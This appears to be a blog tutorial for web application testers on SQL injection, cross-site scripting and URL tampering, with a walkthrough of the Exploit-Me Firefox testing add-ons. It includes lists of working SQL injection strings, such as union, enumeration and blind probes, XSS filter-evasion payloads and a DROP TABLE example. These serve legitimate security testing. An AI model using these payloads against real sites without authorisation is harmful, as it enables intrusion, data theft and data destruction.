 |
|||||||||||||
Table
of Contents
1
Introduction
1.1 What is Injection
Attack
Injection Attack is a type of security exploit in which
the attacker adds a code to a Web form input box to gain access to resources or
make changes to data. It is a request for some action to be performed on a
database or in code. Typically, on a Web form for user authentication, when a
user enters their name and password into the text boxes provided for them,
those values are inserted into a query. If the values entered are found as
expected, the user is allowed access; if they aren't found, access is denied.
1.2 Types of Injection Attacks
Weak input validation is a common vulnerability that could
allow your application to be exploited by a number of injection attacks. The
following are common types of attacks that exploit weak or missing input
validation:
·
SQL Injection Attacks
·
Cross Site Scripting (XSS)
·
URL Rewriting/Tempering
2
SQL
Injection Attacks
2.1 Introduction
“This is the process of inserting SQL statements through
the web application user interface into some query that is then executed by the
server”.
SQL injection attacks are very critical as attacker can
get vital information from server database. To check SQL injection entry points
into your web application, find out code from your code base where direct SQL
queries are executed on database by accepting some user inputs.
If user input data is crafted in SQL queries to query the
database, attacker can inject SQL statements or part of SQL statements as user
inputs to extract vital information from database. Even if attacker is
successful to crash the application, from the SQL query error shown on browser,
attacker can get the information they are looking for. Special characters from
user inputs should be handled/escaped properly in such cases.
2.2 Examples of SQL
Injection Attacks
Followings are the some examples of SQL Injection Attacks:
Attack String
|
1 OR 1=1
|
1' OR '1'='1
|
1'1
|
1 EXEC XP_
|
1 AND 1=1
|
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
|
1 AND USER_NAME() = 'dbo'
|
'; DESC users; --
|
1'1
|
1' AND non_existant_table = '1
|
' OR username IS NOT NULL OR username = '
|
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects
WHERE xtype='U'), 1, 1))) > 116
|
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype
= 'U' --
|
1 UNI/**/ON SELECT ALL FROM WHERE
|
%31%27%20%4F%52%20%27%31%27%3D%27%31
|
1' OR '1'='1
|
1' OR '1'='1
|
3
Cross
Site Scripting (XSS) Attacks
3.1 Introduction
When a user inserts HTML/ client-side script in the user
interface of a web application and this insertion is visible to other users, it
is called XSS.
The tester should additionally check the web application
for XSS (Cross site scripting). Any HTML e.g. <HTML> or any script e.g.
<SCRIPT> should not be accepted by the application. If it is, the
application can be prone to an attack by Cross Site Scripting.
Attacker can use this method to execute malicious script
or URL on victim’s browser. Using cross-site scripting, attacker can use
scripts like JavaScript to steal user cookies and information stored in the
cookies.
Many web applications get some user information and pass
this information in some variables from different pages.
E.g.:
http://www.examplesite.com/index.php?userid=123&query=xyz
Attacker can easily pass some malicious input or
<script> as a ‘&query’ parameter which can explore important
user/server data on browser.
3.2 Examples of XSS Attacks
Followings are the some examples of XSS Attacks:
Attack String
|
<meta
http-equiv="refresh"
content="0;url=javascript:document.vulnerable=true;">
|
<META
HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
|
<SCRIPT>document.vulnerable=true;</SCRIPT>
|
<IMG SRC="jav
ascript:document.vulnerable=true;">
|
<BODY
onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
|
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
|
<iframe
src="javascript:document.vulnerable=true; <
|
</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
|
<BODY
BACKGROUND="javascript:document.vulnerable=true;">
|
<BGSOUND
SRC="javascript:document.vulnerable=true;">
|
¼script¾document.vulnerable=true;¼/script¾
|
<FRAMESET><FRAME
SRC="javascript:document.vulnerable=true;"></FRAMESET>
|
<style><!--</style><script>document.vulnerable=true;//--></script>
|
<![CDATA[<!--]]<script>document.vulnerable=true;//--></script>
|
<xml
src="javascript:document.vulnerable=true;">
|
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
|
<!-- --
--><script>document.vulnerable=true;</script><!-- -- -->
|
4
URL Manipulation/Tempering
Attacks
4.1 Introduction
URL manipulation, also called URL rewriting, is the
process of altering the parameters in a URL (Uniform Resource Locator).
Changing some information in the URL may sometimes lead to unintended behavior
by the server.
The tester should check if the application passes
important information in the query string. This happens when the application
uses the HTTP GET method to pass information between the client and the server.
The information is passed in parameters in the query string. The tester can
modify a parameter value in the query string to check if the server accepts it.
Via HTTP GET request user information is passed to server
for authentication or fetching data. Attacker can manipulate every input
variable passed from this GET request to server in order to get the required
information or to corrupt the data. In such conditions any unusual behavior by
application or web server is the doorway for the attacker to get into the
application.
4.2 URL Manipulation
By manipulating certain parts of a URL, a hacker can get a
web server to deliver web pages he is not supposed to have access to.
On dynamic websites, parameters are mostly passed via the
URL as follows:
http://target/forum/?cat=2
The data present in the URL are automatically created by
the site and when navigating normally, a user simply clicks on the links
proposed by the website. If a user manually modifies the parameter, he can try
different values, for example:
http://target/forum/?cat=6
The hacker may potentially obtain access to an area that
is usually protected.
In addition, the hacker can get the site to process an
unexpected case, for example:
http://target/forum/?cat=***********
In the above example, if the site's designer has not
anticipated the case where the data is not a number, the site may enter an
unexpected state and reveal information in an error message.
4.3 SQL Injection Attacks in
URL
An attacker may abuse the fact that the UserID parameter
is passed to the database without sufficient validation. The attacker can
manipulate the parameter's value to build malicious SQL statements. For
example, setting the value "123 OR 1=1" to the ProductID variable
results in the following URL:
In this example the semicolon is used to pass the database
server multiple statements in a single execution. The second statement is
"DROP TABLE ECF.PERMISSION " which may causes SQL Server to delete
the entire table.
4.4 XSS Attacks in URL
By adding some text in <HTML> tag in URL application
crashes. Below is the example:
5
Tools
5.1 Introduction
Exploit-Me is a suite (add-ons) of Firefox web application
security testing tools designed to be lightweight and easy to use. It includes:
·
SQL Inject-Me
·
XSS-Me
Exploit-Me can be downloaded from following URL: http://labs.securitycompass.com/index.php/exploit-me/
§ SQL Inject-Me: SQL Injection
vulnerabilities can cause a lot of damage to a web application. A malicious
user can possibly view records, delete records, drop tables or gain access to
your server. SQL Inject-Me is the Exploit-Me tool used to test for SQL
Injection vulnerabilities. SQL Inject-Me can easily be download as Add-ons in
Mozilla Firefox. After installation it can be viewed in Tools tab as shown
below:
When we click upon Open SQL Inject Me sidebar, it will
open the SQL Injection tool list in left side bar. As shown below:
§ XSS-Me: Cross-Site Scripting (XSS) is a
common flaw found web applications. XSS flaws can cause serious damage to a web
application. Detecting XSS vulnerabilities early in the development process
will help protect a web application from unnecessary flaws. XSS-Me is the
Exploit-Me tool used to test for reflected XSS vulnerabilities.
XSS-Me can easily be download
as Add-ons in Mozilla Firefox. After installation it can be viewed in Tools tab
as shown below:
When we click upon Open XSS Me sidebar, it will open the
XSS tool list in left side bar. As shown below:
5.2 Functioning of tool
Step 1: Open
the application in Mozilla Firefox. Now from Tools open the SQL Injection-Me
tool. As shown below:
On Sidebar, each tab represents a form on the page and
lists all the fields. For example it is displaying, Username, Password and
Login button:
Step 2: If we
want to insert any SQL Query Injection in any text box fields (Username or
Password) we can select the option from left navigation.
1.
For example if we want to insert SQL Query
Injection for Username text field. Select the checkbox and click SQL query from
‘txtLogin’ drop down. It will display selected SQL Query in “Username” textbox
of the application as shown below here we are selecting query “1' OR '1'='1”
Now click upon Login button on the application and check
the result. Same we can select different SQL Quires from drop down and check
the results.
2.
For example if we select query “1' OR '1'='1”
from dropdown and click on Login.
Result: Following error will come:
Step3: If you want to execute different quires simultaneously and
want to check the results by tool, you need to select the checkboxes from left
navigation and click on “Execute” button. It will display results. User can
also select “Test all form with all attacks” option, it will execute all selected
quires on all forms of application.
It will display results as
follows. Error will display in “Red” color and Queries which will execute
successfully will display in “Green” color.
5.3 How to customized Quires in
Tool library
Step1: Go to “Tool” menu, select SQL Inject me, and then
go to options.
Step2: It will open a pop up window from where user
can “Add”, “Remove” SQL quires.
No comments:
Post a Comment